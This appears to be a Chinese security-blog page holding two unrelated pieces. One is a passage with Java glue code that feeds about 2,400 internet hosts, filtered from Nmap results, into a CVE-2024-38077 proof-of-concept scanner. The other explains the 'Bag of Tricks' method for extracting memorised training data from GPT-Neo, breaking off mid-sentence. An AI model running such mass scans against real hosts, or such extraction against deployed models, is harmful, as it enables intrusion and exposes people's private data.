..既然有了一堆IP，接下来该进行的就是如何把这些IP导入工具开扫。但此时的poc工具是不支持外部IP导入的，并且对于“Can Not Reach Host.”之类的资产扫描进度会很慢，所以要考虑如何兼顾效率和准确性的问题。 Nmap 由于之前经过测试，对于确实存在漏洞的资产，poc的响应是很快的。CVE-2024-38077的利用条件之一是同时开放135和3389端口，而空间测绘工具搜索的结果是未验证135的，所以接下来的思路是使用Nmap对5万个资产探测一下两个端口的开放情况，然后根据输出结果筛选出两个端口均为open状态的IP，最后尝试将筛选出的IP导入poc工具扫描。这个阶段也尝试过fscan等其他工具，但是比较下来Nmap的输出是最整齐的（前提是控制输入参数），方便后续处理：从输出文件可以看出，除了第一行是注释，下面的内容都很有规律，每六行是对一个IP的描述，包含135和3389两个端口，而且格式都固定。由于需求要的是开放两个端口的所有IP，现成的工具没有能够满足的，只能自己写，又一次掏出了idea...... 胶水代码从Nmap的输出结果不难分析，如果要写代码处理的话，每六行可以看成是一个Nmap类，而这个类里面只需要3个属性，IP、port-135、port-3389。直接上代码： //读取外部文件 BufferedReader reader = new BufferedReader(new FileReader(file)); MNmap nmap = null; ArrayList<MNmap> list = new ArrayList(); int count = 0; String line; //循环读取每一行 while ((line = reader.readLine()) != null) { //ip if (line.startsWith("Nmap")) { nmap = new MNmap(); nmap.ip = TNmap.findIp(line); } //135 if (line.startsWith("135") && nmap != null) { nmap.p135 = TNmap.findP135(line); } //3389 if (line.startsWith("3389") && nmap != null) { nmap.p3389 = TNmap.findP3389(line); //将每一个nmap对象加入list list.add(nmap); } } 到这里整个任务已经完成了一半，精准的资产已经筛选出来了，大概2400多个。接下来就是使用poc工具扫描了，毕竟两千多条数据，总不能手动设置两千多次吧，所以还是要写代码： //循环执行exe工具，参数是nmap的IP，并逐个获取执行结果 for (int i = 0; i < list.size();i++) { MNmap nmap1 = list.get(i); if ("open".equals(nmap1.p135) && "open".equals(nmap1.p3389)) { try { // 指定要执行的exe文件及其参数 ProcessBuilder processBuilder = new ProcessBuilder(exeFile, nmap1.ip); // 启动进程 Process process = processBuilder.start(); // 读取标准输出 BufferedReader r = new BufferedReader(new InputStreamReader(process.getInputStream())); String l; while ((l = r.readLine()) != null) { if (l.contains("Vulnerability")) System.out.println(l); } // 读取标准错误（如果需要） BufferedReader errorReader = new BufferedReader(new InputStreamReader(process.getErrorStream())); String errorLine; while ((errorLine = errorReader.readLine()) != null) { System.out.println("Standard Error: " + errorLine); } // 等待外部程序执行完成 int exitCode = process.waitFor(); if (exitCode == 0) { System.out.println("程序执行完成"); } else { System.out.println("程序执行出错，退出码：" + exitCode); } } catch (IOException | InterruptedException e) { e.printStackTrace(); } //计数 count++; } } System.out.println("total: " + count); 这里贴出的只是关键的两段代码，完整项目见文末链接。最后将项目打成jar包，与CVE-2024-38077.exe和Nmap输出文件放在同一目录下：开启powershell运行jar包，设置poc参数为CVE-2024-38077，同时指定输入IP的文件路径和输出文件路径，等待扫描完后得到存在漏洞的资产列表。总结 CVE-2024-38077漏洞的探测难点在于一是没有成型的工具，二是空间测绘出来的大批量资产如何导出与二次筛选。本文的思路只是临时方案，相信后面会有大神公开其exp，最终出现像MS17010一样的工具。

靶场战神为何会陨落？

大模型隐私泄露攻击技巧分析与复现

前言大型语言模型，尤其是像ChatGPT这样的模型，尽管在自然语言处理领域展现了强大的能力，但也伴随着隐私泄露的潜在风险。在模型的训练过程中，可能会接触到大量的用户数据，其中包括敏感的个人信息，进而带来隐私泄露的可能性。此外，模型在推理时有时会无意中回忆起训练数据中的敏感信息，这一点也引发了广泛的关注。隐私泄露的风险主要来源于两个方面：一是数据在传输过程中的安全性，二是模型本身的记忆风险。在数据传输过程中，如果没有采取充分的安全措施，攻击者可能会截获数据，进而窃取敏感信息，给用户和组织带来安全隐患。此外，在模型的训练和推理阶段，如果使用了个人身份信息或企业数据等敏感数据，这些数据可能会被模型运营方窥探或收集，存在被滥用的风险。过去已经发生了多起与此相关的事件，导致许多大公司禁止员工使用ChatGPT。此前的研究表明，当让大模型反复生成某些特定词汇时，它可能会在随后的输出中暴露出训练数据中的敏感内容。学术研究表明，对模型进行训练数据提取攻击是切实可行的。攻击者可以通过与预训练模型互动，从而恢复出训练数据集中包含的个别示例。例如，GPT-2曾被发现能够记住训练数据中的一些个人信息，如姓名、电子邮件地址、电话号码、传真号码和实际地址。这不仅带来了严重的隐私风险，还对语言模型的泛化能力提出了质疑。本文要探讨的就是可以高效从大模型中提取出用于训练的隐私数据的技巧与方法，主要来自《Bag of Tricks for Training Data Extraction from Language Models》，这篇论文发在了人工智能顶级会议ICML 2023上。背景知识尽管大模型在各种下游语言任务中展现了令人瞩目的性能，但其内在的记忆效应使得训练数据可能被提取出来。这些训练数据可能包含敏感信息，如姓名、电子邮件地址、电话号码和物理地址，从而引发隐私泄露问题，阻碍了大模型在更广泛应用中的推进。之前谷歌举办了一个比赛，链接如下 https://github.com/google-research/lm-extraction-benchmark/tree/master这是一个针对性数据提取的挑战赛,目的是测试参赛者是否能从给定的前缀中准确预测后缀,从而构成整个序列,使其包含在训练数据集中。这与无针对性的攻击不同,无针对性的攻击是搜索训练数据集中出现的任意数据。针对性提取被认为更有价值和具有挑战性,因为它可以帮助恢复与特定主题相关的关键信息,而不是任意的数据。此外,评估针对性提取也更容易,只需检查给定前缀的正确后缀是否被预测,而无针对性攻击需要检查整个庞大的训练数据集。这个比赛使用1.3B参数的GPT-Neo模型,以1-eidetic记忆为目标,即模型能够记住训练数据中出现1次的字符串。这比无针对性和更高eidetic记忆的设置更具有挑战性。比赛的基准测试集包含从The Pile数据集中选取的20,000个示例,这个数据集已被用于训练许多最新的大型语言模型,包括GPT-Neo。每个示例被分为长度为50的前缀和后缀,攻击的任务是在给定前缀的情况下预测正确的后缀。这些示例被设计成相对容易提取的,即存在一个前缀长度使得模型可以准确生成后缀。训练数据提取从预训练的语言模型中提取训练数据,即所谓的"语言模型数据提取",是一种恢复用于训练模型的示例的方法。这是一个相对较新的任务,但背后的许多技术和分析方法,如成员资格推断和利用网络记忆进行攻击,早就已经被引入。 Carlini等人是最早定义模型知识提取和κ-eidetic记忆概念的人,并提出了有希望的数据提取训练策略。关于记忆的理论属性以及在敏感领域应用模型提取(如临床笔记分析)等,已经成为这个领域后续研究的焦点。最近的研究也有一些重要发现: Kandpal等人证明,在语言模型中,数据提取的效果经常归因于常用网络抓取训练集中的重复。 Jagielski等人使用非确定性为忘记记忆示例提供了一种解释。 Carlini等人分析了影响训练数据记忆的三个主要因素。 Feldman指出,为了达到接近最优的性能,在自然数据分布下需要记忆标签。 Lehman等人指出,预训练的BERT在训练临床笔记时存在敏感数据泄露的风险,特别是当数据表现出高水平的重复或"笔记膨胀"时。总的来说,这个新兴领域正在深入探讨如何从语言模型中提取训练数据,以及这种提取带来的安全和隐私风险。最新的研究成果为进一步理解和应对这些挑战提供了重要的洞见。成员推理攻击成员资格推断攻击(MIA)是一种与训练数据提取密切相关的对抗性任务,目标是在只能对模型进行黑盒访问的情况下,确定给定记录是否在模型的训练数据集中。MIA已被证明在各种机器学习任务中都是有效的,包括分类和生成模型。 MIA使用的方法主要分为两类: 基于分类器的方法:这涉及训练一个二元分类器来识别成员和非成员之间的复杂模式关系,影子训练是一种常用的技术。基于度量的方法:这通过首先计算模型预测向量上的度量(如欧几里得距离或余弦相似度)来进行成员资格推断。这两类方法都有各自的优缺点,研究人员正在不断探索新的MIA攻击方法,以更有效地从机器学习模型中推断训练数据。这突出了训练数据隐私保护在模型部署和应用中的重要性。对MIA技术的深入理解,有助于设计更加安全和隐私保护的机器学习模型训练和部署策略,这对于广泛应用尤其是在敏感领域的应用至关重要。其他基于记忆的攻击大型预训练模型由于容易记住训练数据中的信息,因此面临着各种潜在的安全和隐私风险。除了训练数据提取攻击和成员资格推断攻击之外,还有其他基于模型记忆的攻击针对这类模型。其中,模型提取攻击关注于复制给定的黑盒模型的功能性能。在这类攻击中,对手试图构建一个具有与原始黑盒模型相似预测性能的第二个模型,从而可以在不获取原始模型的情况下复制其功能。针对模型提取攻击的保护措施,集中在如何限制模型的功能复制。另一类攻击是属性推断攻击,其目标是从模型中提取特定的个人属性信息,如地点、职业和兴趣等。这些属性信息可能是模型生产者无意中共享的训练数据属性,例如生成数据的环境或属于特定类别的数据比例。与训练数据提取攻击不同,属性/属性推断攻击不需要事先知道要提取的具体属性。而训练数据提取攻击需要生成与训练数据完全一致的信息,这更加困难和危险。总之,这些基于模型记忆的各类攻击,都突显了大型预训练模型在隐私保护方面的重大挑战。如何有效应对这些攻击,成为当前机器学习安全研究的一个重要焦点。威胁模型数据集是从 Pile 训练数据集中抽取的 20,000 个样本子集。每个样本由一个 50-token 的前缀和一个 50-token 的后缀组成。攻击者的目标是给定前缀时,尽可能准确地预测后缀。这个数据集中,所有 100-token 长的句子在训练集中只出现一次。采用了 HuggingFace Transformers 上实现的 GPT-Neo 1.3B 模型作为语言模型。这是一个基于 GPT-3 架构复制品,针对 Pile 数据集进行过训练的模型。 GPT-Neo 是一个自回归语言模型 fθ,通过链式规则生成一系列token。这个场景中,攻击者希望利用语言模型对训练数据的记忆,来尽可能准确地预测给定前缀的后缀。由于数据集中每个句子在训练集中只出现一次,这就给攻击者提供了一个机会,试图从模型中提取这些罕见句子的信息。在句子层面，给定一个前缀p，我们表示在前缀p上有条件生成某个后缀s的概率为fθ(s|p)。我们专注于针对性提取 κ-eidetic 记忆数据的威胁模型，我们选择 κ=1。根据 Carlini定义的模型知识提取，我们假设语言模型通过最可能的标准生成后缀 s。然后我们可以将针对性提取的正式定义写为：给定一个包含在训练数据中的前缀 p 和一个预训练的语言模型 fθ。针对性提取是通过下式来生成后缀至于 κ-eidetic 记忆数据，我们遵循 Carlini的定义，即句子 [p, s] 在训练数据中出现不超过 κ 个示例。在实践中，生成句子的长度通常使用截断和连接技术固定在训练数据集上。如果生成的句子短于指定长度，使用填充 token 将其增加到所需长度。流程第一阶段 - 后缀生成: 利用自回归语言模型 fθ 计算词汇表中每个 token 的生成概率分布。从这个概率分布中采样生成下一个 token,采用 top-k 策略限制采样范围,将 k 设为10。不断重复这个采样过程,根据前缀生成一组可能的后缀。第二阶段 - 后缀排名: 使用成员资格推断攻击,根据每个生成后缀的困惑度进行排序。只保留那些概率较高(困惑度较低)的后缀。这样的两阶段流程,首先利用语言模型生成可能的后缀候选,然后通过成员资格推断攻击对这些候选进行评估和筛选,从而尽可能还原出训练数据中罕见的完整句子。这个训练数据提取攻击的关键在于,利用语言模型对训练数据的"记忆"来生成接近训练样本的内容,再结合成员资格推断技术进一步挖掘出高概率的真实训练样本。其中 N 是生成句子中的 token 数量。改进策略为了改进后缀生成，我们可以来看看真实和生成token的logits分布。如下图所示，这两种分布之间存在显著差异。为了解决这个问题，我们可以采用一系列技术进行改进采样策略在自然语言处理的条件生成任务中,最常见的目标是最大化解码,即给定前缀,找到具有最高概率的后缀序列。这种"最大似然"策略同样适用于训练数据提取攻击场景,因为模型会试图最大化生成的内容与真实训练数据的相似性。然而,从模型中直接找到理论上的全局最优解(argmax序列)是一个不切实际的目标。原因在于,语言模型通常是auto-regressive的,每个token的生成都依赖于前面生成的内容,因此搜索全局最优解的计算复杂度会随序列长度呈指数级上升,实际上是不可行的。因此,常见的做法是采用束搜索(Beam Search)作为一种近似解决方案。束搜索会在每一步保留若干个得分最高的部分解,而不是简单地选择概率最高的单一路径。这种方式可以有效降低计算复杂度,但同时也存在一些问题: 束搜索可能会缺乏生成输出的多样性,因为它总是倾向于选择得分最高的少数几个路径。尽管增大束宽度可以提高性能,但当束宽超过一定程度时,性能增益会迅速下降,同时也会带来更高的内存开销。为了克服束搜索的局限性,我们可以采用随机采样的方法,引入更多的多样性。常见的采样策略包括: Top-k 采样:只从概率最高的k个token中进行采样,k是一个超参数。这种方法可以控制生成输出的多样性,但过大的k可能会降低输出的质量和准确性。 Nucleus 采样(Nucleus Sampling):从概率总和达到设定阈值的token集合中进行采样,可以自适应地调整采样空间的大小。典型采样(Typical Sampling):从完整的概率分布中采样,偏向采样接近平均概率的token,可以在保持输出质量的同时引入更多的多样性。总的来说,条件生成任务中的解码策略需要在生成质量、多样性和计算复杂度之间进行权衡。束搜索作为一种近似解决方案,能够有效控制计算成本,但缺乏生成多样性。而随机采样方法则可以引入更多的多样性,但需要在采样策略上进行细致的调整。这些技术在训练数据提取攻击中都有重要的应用价值。 Nucleus采样的核心思想是从总概率达到一定阈值η的token集合中进行采样,而不是简单地从概率最高的k个token中采样。在故事生成任务中,研究表明较低的η值(如0.6左右)更有利于生成更为多样化和创造性的内容。这说明在生成任务中,保留一定程度的低概率token是有益的,可以引入更多的多样性。但在训练数据提取攻击这样的任务中,较大的η值(约0.6)效果更好,相比基线提升了31%的提取精度。这表明对于数据提取这类任务,我们需要更加关注生成内容与训练数据的相似性,而不是过度强调多样性。如下图示进一步说明了这一点,即η值过大或过小都会导致性能下降。存在一个最优的η值区间,需要根据具体任务进行调整。 Typical-ϕ是一种用于自然语言生成任务的采样策略。它的核心思想是选择与预期输出内容相似的token,从而保证在典型解码中能够考虑到原始分布的概率质量。这种策略可以提高生成句子的一致性,同时减少一些容易出现的退化重复等问题。Typical-ϕ 策略在数学上等价于一个带有熵率约束的子集优化问题。这种策略在一定程度上可以控制生成文本的多样性和流畅性,平衡了文本质量和创造性。 Typical-ϕ 策略在不同任务中表现可能会有所不同。例如,在抽象摘要和故事生成任务中,Typical-ϕ 策略展现出一定的非单调趋势,即随着ϕ值的变化,生成文本的质量并非线性提升。这说明Typical-ϕ需要根据具体任务进行合适的参数调整,以达到最佳的生成效果。概率分布调整温度控制(Temperature) 这是一种直接调整概率分布的策略,通过引入温度参数T来重新归一化语言模型的输出概率分布。较高的温度T > 1会降低模型预测的确信度,但可以增加生成文本的多样性。研究发现,在生成过程中逐渐降低温度是有益的,可以在多样性和生成效率之间达到平衡。但过高的温度也可能导致生成的文本偏离真实分布,降低效率。因此需要合理调节温度参数。重复惩罚(Repetition Penalty) 这是一种基于条件语言模型的策略,通过修改每个token的生成概率来抑制重复token的出现。具体做法是,重复token的logit在进入softmax层之前被除以一个值r。当r > 1时会惩罚重复,r < 1则会鼓励重复。研究发现,重复惩罚对训练数据提取任务通常有负面影响,因为它可能会抑制一些有用的重复信息。因此在使用重复惩罚时,需要根据具体任务和数据特点来合理设置参数r,在抑制不必要重复和保留有意义重复之间寻求平衡。总的来说,温度控制和重复惩罚是两种常见的直接调整概率分布的策略,可以在一定程度上提高自然语言生成的质量和多样性。但它们也存在一些局限性,需要根据实际应用场景进行合理的参数调整和组合使用,以达到最佳的生成效果。为了有效的向量化,通常在训练语言模型时将多个句子打包成固定长度的序列。例如,句子"Yu的电话号码是12345"可能在训练集中被截断,或与另一个句子拼接成前缀,如"Yu的地址在XXX。Yu的电话号码是12345"。训练集中的这些前缀序列并不总是完整的句子。为了更好地模拟这种训练设置,我们可以调整上下文窗口大小和位置偏移。动态上下文窗口训练窗口的长度可能与提取窗口的长度不同。因此，提出调整上下文窗口的大小，即之前生成的token的数量，如下所示。此外，鼓励不同上下文窗口大小的结果在确定下一个生成的token时进行协作：其中 hW 表示集成方法，W 表示集成超参数，包括不同上下文窗口大小的数量 m 和每个窗口大小 w_i。我们在代码中使用 m = 4 和 w_i ∈ {n, n - 1, n - 2, n - 3}。动态位置偏移位置嵌入被添加到像 GPT-Neo 这样的模型中的 token 特征中。在训练过程中,这是按句子批次添加的,导致相同的句子在不同的训练批次和生成过程中具有不同偏移的位置嵌入。为了改进对记忆后缀的提取,可以通过评估不同偏移位置并选择 "最佳" 的一个来恢复训练期间使用的位置。具体来说,对于给定的前缀 p,评估不同的偏移位置 C = c_i,其中 c_i 是一系列连续自然数的列表,c_i = {c_i1, ...},使得 |c_i| = |p|,并计算相应的困惑度值。然后选择具有最低困惑度值的位置作为生成后缀的位置。通过评估不同的位置偏移来选择最佳的位置嵌入,来提高模型对记忆后缀的提取能力。这种方法可以很好地补充原有的位置嵌入方法,增强模型的性能。其中 ψ(·) 表示位置编码层，φ(·) 表示特征映射函数，𝜙^ϕ^ 表示包含位置编码的特征映射函数，P 计算前缀的困惑度。前瞻(Look-Ahead) 有时候在生成过程中只有一个或两个token被错误生成或者放置在不适当的位置。为了解决这个问题，可以使用一种技术，它涉及向前看ν步，并使用后续token的概率来通知当前token的生成。前瞻的目标是使用后验分布来帮助计算当前token的生成概率。后验被计算为：设 Track(xstart, xend | xcond) 表示从 xstart 开始到 xend 结束，在 xcond 条件下的轨迹的概率乘积。那么我们可以写ν步后验为：其中 Track 被计算为：超参数优化以上提到的技巧涉及到各种超参数，简单地使用最佳参数通常是次优的。手动搜索最佳超参数，也称为 "babysitting"，可能非常耗时。所以其实可以使用多功能的架构自动调整方法，结合了高效的搜索和剪枝策略，根据先进的框架来确定优化的超参数。作为搜索算法，比如可以确定搜索目标为 MP（精确度），搜索的参数包括 top-k、nucleus-η、typical-ϕ、温度 T 和重复惩罚 r。后缀排名改进在生成多个后缀之后，会进行一个排名过程，使用困惑度 P 作为度量来消除那些不太可能的后缀。然而，下图的统计分析揭示了真实句子并不总是具有最低困惑度值句子级标准文本的熵，由 Zlib 压缩算法用位数来确定，是序列信息内容的量化指标。使用由 GPT-Neo 模型计算的给定句子的困惑度与相同句子的 Zlib 熵的比率作为成员推断的度量。此外还可以分析困惑度和 Zlib 熵的乘积的潜在效用，因为当模型对其预测有高度信心时，这两种度量都趋于减少。实验表明这两种度量在成员推断任务的整体性能上只产生了边际改进。词级别标准对高置信度的奖励。记忆数据的高置信度存在是被称为 "记忆效应"的现象的明确特征之一。我们对高置信度的 token 进行奖励。如果句子包含置信度高的 token，那么生成的 token 的可能性高于某个阈值，并且生成的 token 与其他 token 之间的差异也高于某个阈值，我们会将其排名提高。具体来说，对于生成后缀中的 token 𝑥𝑛x**n，如果其概率高于阈值 0.9，那么我们会从后缀 𝑠𝑖s**i 的分数中减去一个给定的数值 0.1（原始分数 𝑠𝑖s**i 是其困惑度）。鼓励惊讶模式。根据最近的研究，人类文本生成经常表现出一种模式，即高困惑度的 token 被间歇性地包含，而不是一直选择低困惑度的 token。为了解决这个问题，通过只基于大多数 token 计算生成提示的困惑度来鼓励惊讶 token（高困惑度 token）的存在：其中 µ 和 σ 分别表示一批中 𝑝(𝑥𝑛∣𝑥[0:𝑛−1])p(x**n∣x[0:n−1]) 的均值和标准差。使用这种方法，生成中包含的惊讶 token 不会在整体句子困惑度上产生负面影响，从而在成员推断期间增加了它们被选择的可能性。实战分析关键的函数如下函数通过批处理方式高效地生成文本，并计算每个生成文本的损失，以评估模型在生成任务中的表现。这样可以帮助分析和改进生成文本的质量和模型的泛化能力。该函数的主要目的是从给定的提示中生成文本，并计算生成文本的概率（或损失）。输入参数 prompts: 一个包含提示的numpy数组。 batch_size: 每次处理的提示数量，默认值为32。主要步骤初始化: 初始化空列表用于存储生成的文本和相应的损失。确定生成文本的总长度，这包括前缀和后缀的长度。批次处理: 将提示按批次进行处理，批次大小由 batch_size 决定。将每个批次的提示堆叠成一个批次，并转换为PyTorch张量。生成文本: 使用模型生成文本。生成过程中：将输入提示移至GPU。设置生成文本的最大长度。进行随机采样（do_sample=True），并只考虑概率最高的10个标记（top_k=10）。处理生成过程中可能出现的填充标记。计算概率: 将生成的文本再次输入模型，计算每个标记的概率。提取模型输出的logits，重新整形为二维张量。使用交叉熵计算每个标记的损失。将损失重新整形，并提取后缀部分的损失。计算每个生成序列的平均损失，作为生成文本的概率。存储结果: 将生成的文本和损失转换为numpy数组，并分别存储在列表中。返回结果: 返回生成的文本和相应的损失，以numpy数组的形式返回。如下函数组合在一起用于评估和比较语言模型的生成质量。write_array函数保存生成结果，hamming函数计算生成文本与真实文本之间的汉明距离，gt_position函数计算真实答案的损失，compare_loss函数比较生成文本与真实文本的损失，plot_hist函数则用于可视化损失分布。通过这些步骤，可以全面评估模型在生成任务中的表现和准确性。 1. write_array 功能: 将numpy数组保存到文件中，文件名包含一个唯一标识符。输入: 文件路径（包含格式化标记）、数组、唯一标识符（整数或字符串）。实现: 使用给定的格式化标记生成文件名，然后将数组保存到该文件中。 2. hamming 功能: 计算生成序列与真实序列之间的汉明距离。输入: 真实序列和生成的序列。实现: 如果生成的序列是二维的，逐行计算每行的汉明距离。否则，计算生成序列第一行与真实序列的汉明距离。返回平均汉明距离和汉明距离的形状。 3. gt_position 功能: 计算真实答案序列的损失。输入: 真实答案序列列表和批次大小（默认为50）。实现: 将答案分批处理。计算每个标记的logits。使用交叉熵计算每个标记的损失。提取后缀部分的损失，并计算平均损失。返回每个序列的损失列表。 4. compare_loss 功能: 比较真实序列和生成序列的损失。输入: 真实序列的损失和生成序列的损失。实现: 将两组损失拼接在一起。对每个序列的损失进行排序。获取排序后的索引。返回排序后的损失，排序索引和排名第一的索引。 5. plot_hist 功能: 绘制损失的直方图。输入: 损失数组。实现: 该函数目前为空，未实现绘图逻辑。如下函数组合在一起用于处理和评估语言模型的生成任务。load_prompts函数加载提示数据，is_memorization函数评估生成模型是否记住了训练数据，error_100函数计算在发生100次错误之前的匹配次数，precision_multiprompts函数计算多提示生成序列的精确度，prepare_data函数则准备实验所需的数据和目录结构。这些步骤帮助全面评估和改进模型的生成质量和泛化能力。 1. load_prompts 功能: 从指定目录加载numpy文件并转换为64位整数类型的numpy数组。输入: dir_: 文件所在的目录路径。 file_name: 文件名。实现: 通过拼接目录路径和文件名构造完整文件路径，加载文件并转换数据类型。 2. is_memorization 功能: 计算生成的序列与真实序列完全匹配的比例，以确定模型是否记住了训练数据。输入: guesses: 生成的序列。 answers: 真实序列。实现: 对比生成的序列和真实序列是否完全相同，统计完全匹配的次数。计算匹配次数在所有生成序列中的比例。 3. error_100 功能: 计算在前100个错误之前的正确匹配次数。输入: guesses_order: 按顺序排列的生成序列。 order: 序列顺序索引。 answers: 真实序列。实现: 遍历生成序列，统计与真实序列匹配的次数，直到发生100次错误为止。返回在发生100次错误之前的总遍历次数和超出100次错误的匹配数。 4. precision_multiprompts 功能: 计算多提示生成序列的精确度。输入: generations: 多提示生成的序列。 answers: 真实序列。 num_perprompt: 每个提示生成的序列数量。实现: 截取每个提示生成的前num_perprompt个序列。检查每个提示生成的序列是否与真实序列匹配。计算匹配的提示数量占总提示数量的比例。 5. prepare_data 功能: 准备数据和目录结构以进行实验。输入: val_set_num: 验证集的数量。实现: 构造实验目录和生成结果、损失结果的子目录。加载提示数据，并提取验证集部分的提示数据。返回构造的目录路径和提示数据。 ### 如下函数组合在一起用于处理和评估语言模型的生成任务。 write_guesses_order函数将生成的序列按顺序写入CSV文件，便于进一步分析。 edit_dist函数计算生成序列和真实序列之间的编辑距离，这是评估生成质量的重要指标。 metric_print函数计算并打印各种评估指标，包括精度、多提示精度、前100个错误之前的正确匹配数、汉明距离和编辑距离。这些指标帮助全面评估模型在生成任务中的表现和准确性。 1. write_guesses_order 功能: 将生成的序列按顺序写入CSV文件。输入: generations_per_prompt: 每个提示生成的序列数。 order: 序列的顺序索引。 guesses_order: 生成的序列按顺序排列。实现: 打开CSV文件进行写操作，文件名包含generations_per_prompt。写入表头。遍历序列索引和生成的序列，将每个序列按指定格式写入CSV文件。 2. edit_dist 功能: 计算生成序列和真实序列之间的编辑距离。输入: answers: 真实序列。 generations_one: 生成的单个序列。实现: 初始化编辑距离总和为0。遍历真实序列和生成序列，计算每对序列的编辑距离并累加。返回平均编辑距离。 3. metric_print 功能: 计算并打印各种评估指标。输入: generations_one: 单个生成序列。 all_generations: 所有生成序列。 generations_per_prompt: 每个提示生成的序列数。 generations_order: 按顺序排列的生成序列。 order: 序列的顺序索引。 val_set_num: 验证集的数量。实现: 加载真实答案数据。打印生成序列和真实序列的形状。计算生成序列的精度并打印。计算多提示生成序列的精度并打印。计算前100个错误之前的正确匹配数并打印。计算生成序列和真实序列的汉明距离并打印。计算生成序列和真实序列的编辑距离并打印。返回各种评估指标。我们首先来看基线的攻击效果我们在前面提到Zlib 压缩算法，可以用来衡量文本的熵，即信息内容的量化指标。在这项研究中，Zlib 用于与语言模型计算的困惑度相结合，作为成员推断的一个度量标准。具体地，使用 GPT-Neo 模型对给定句子计算的困惑度与相同句子的 Zlib 熵的比值，来评估句子是否可能属于模型的训练数据集。但是 Zlib 方法的效果是有限的。尽管 Zlib 熵和困惑度都是衡量模型对句子预测信心的指标，且两者在模型高度自信时趋于减少，但它们在成员推断任务的整体性能上只产生了边际（即很小的）改进。这表明，尽管 Zlib 方法在理论上是一个有趣的尝试，但在实际应用中可能不是最有效的手段。所以我们可以来看看是否如此首先来看看zlib在实现上的不同 generate_for_prompts函数用于生成给定提示的输出序列，并计算每个生成序列的损失输入参数 prompts: 一个包含提示序列的numpy数组。 batch_size: 每个批次处理的提示数量，默认值为32。输出生成的序列数组和对应的损失数组。步骤初始化: generations 和 losses 用于存储生成的序列和计算的损失。 generation_len 计算生成序列的长度，该长度为后缀和前缀的总和。批次处理: 将提示序列按批次进行处理。对每个批次，提取相应的提示序列，并将其转换为PyTorch张量。生成序列: 在禁用梯度计算的上下文中，使用模型生成序列。 max_length 设置为生成序列的总长度。 do_sample=True 和 top_k=10 控制生成策略。 pad_token_id=50256 设置填充标记ID，避免警告。计算损失: 生成序列后，计算每个生成序列的概率。将生成的序列作为输入和标签传递给模型。提取logits并重新形状，以适应交叉熵损失计算。计算每个标记的损失，只考虑后缀部分的损失。压缩长度调整: 使用zlib库对每个生成的序列进行压缩，并获取压缩后的长度。调整每个生成序列的损失，使其与压缩长度成正比。结果存储: 将生成的序列和对应的损失添加到结果列表中。最后，将结果转换为至少二维的numpy数组并返回。该函数通过以下几个步骤生成序列并计算损失：按批次加载提示序列。使用预训练模型生成序列。计算生成序列的损失。通过压缩调整损失。存储并返回生成的序列和损失。这种方法既考虑了生成序列的质量（通过损失计算），又通过压缩长度的调整，间接考虑了序列的复杂性和压缩率。执行后效果如下之前还提到了动态上下文窗口（Dynamic Context Window）技术。在语言模型生成文本时，如果生成了一个错误的token，可能会因为语言模型的自回归特性而导致后续的token也生成错误。通过使用动态上下文窗口，可以从不同长度的历史上下文中获取信息，这有助于减少这种错误传播。通过调整上下文窗口的大小，即考虑不同数量的之前生成的token，可以帮助模型更好地理解前缀的上下文，从而提高生成后缀的准确性。文中提到的实验结果显示，使用动态上下文窗口可以显著提高数据提取的准确性。动态上下文窗口允许模型在生成每个token时考虑不同长度的上下文，这增加了生成过程的灵活性，使模型能够根据当前的上下文信息选择最合适的token。有两种实现动态上下文窗口的方法。第一种是加权平均策略（Weighted Average Strategy），第二种是基于投票机制的策略（Voting Strategy）。两种方法都旨在结合不同窗口大小生成的概率，以提高生成后缀的准确性。我们首先来看代码上的不同 1. winlen_logits_output 功能: 计算输入序列的一部分（从win_len到input_len的片段）的模型输出logits。输入: input_batch: 输入序列的批次。 win_len: 截断窗口的起始位置。 input_len: 截断窗口的结束位置。 answer_batch: 真实答案的批次。实现: 禁用梯度计算以提高效率。截取输入序列的指定部分并传递给模型，计算logits。初始化一个空列表val，准备存储一些计算结果（但在此函数中并未实际使用）。根据训练标志决定如何处理logits。返回最后一层logits和空的val列表。 2. zlib_filter 功能: 预留的过滤函数，目前没有实现任何功能。 3. vote_for_the_one 功能: 通过投票机制选择最可能的输出序列。输入: last_logits: 最后一层的logits。 k: 用于投票的前k个logits。 answers: 真实答案。 input_len: 输入序列的长度。实现: 初始化投票计数数组。获取logits中每个序列的前k个最高值的索引。为每个索引分配线性权重。打印预测结果和原始结果的比较。返回投票计数最高的索引作为最终预测。 4. logits_add 功能: 通过加权求和的方式整合logits，得到最终的预测。输入: last_logits: 多个窗口的logits。 weight_win: 每个窗口的权重。实现: 使用权重加权求和各个窗口的logits。返回加权求和后的logits中概率最高的索引作为最终预测。这些函数用于处理和评估生成模型的输出： winlen_logits_output 提取并计算输入序列部分片段的logits，帮助理解模型对不同输入片段的响应。 vote_for_the_one 使用投票机制从logits中选择最可能的输出，提高预测的准确性。 logits_add 通过加权求和不同窗口的logits，进一步优化预测结果。 zlib_filter 目前未实现，可能预留用于将来对数据进行某种过滤处理。这用于生成给定提示的输出序列，并计算每个生成序列的损失的函数输入参数 prompts: 包含提示序列的numpy数组。 batch_size: 每个批次处理的提示数量。 _SUFFIX_LEN, _PREFIX_LEN: 后缀和前缀的长度。 _DATASET_DIR.value: 数据集的目录路径。 _val_set_num.value: 用于加载的验证集数量。输出生成的序列数组 (generations) 和对应的损失数组 (losses)。主要步骤初始化: generations 和 losses 初始化为空列表。 generation_len 计算生成序列的长度，为后缀和前缀长度之和。 answers 加载验证集的答案数据。循环处理提示序列: 根据设定的批次大小，循环处理提示序列。每次循环中，提取并准备输入的提示批次 (prompt_batch) 和对应的答案批次 (answers_batch)。生成序列: 使用带有截断窗口的方法生成序列，通过调用 gene_next_token 函数获取每次生成的下一个标记。将生成的标记 (generated_tokens) 拼接在一起形成完整的生成序列。将生成序列转换为PyTorch张量，并在禁用梯度计算的上下文中生成模型输出 (generated_tokens 是最终的生成序列)。计算损失: 计算每个生成序列的logits。使用交叉熵损失函数计算损失。将损失加入到 losses 列表中。返回结果: 将 generations 和 losses 转换为至少二维的numpy数组，并返回。执行后效果如下在上图可以看到指标有极大的提升（可以看precision，精确度是指正确生成的后缀占给定前缀总数的比例。这是通过比较生成的后缀和实际的训练数据后缀来计算的。精确度反映了模型生成正确后缀的能力。这个值越高说明效果越好;或者也可以看hamming dist，汉明距离是用来衡量两个等长字符串之间差异的指标，计算为两个字符串对应位置上不同符号的数量。在训练数据提取的上下文中，汉明距离用来定量评估生成后缀与真实后缀之间的相似度，提供了一个在token级别上对提取方法性能的评估。这个值越小，说明效果越好）在来看看我们在上文提到的另一个改进策略：一种基于词级别的排名方法，称为 "Reward on high confidence"（简称 highconf 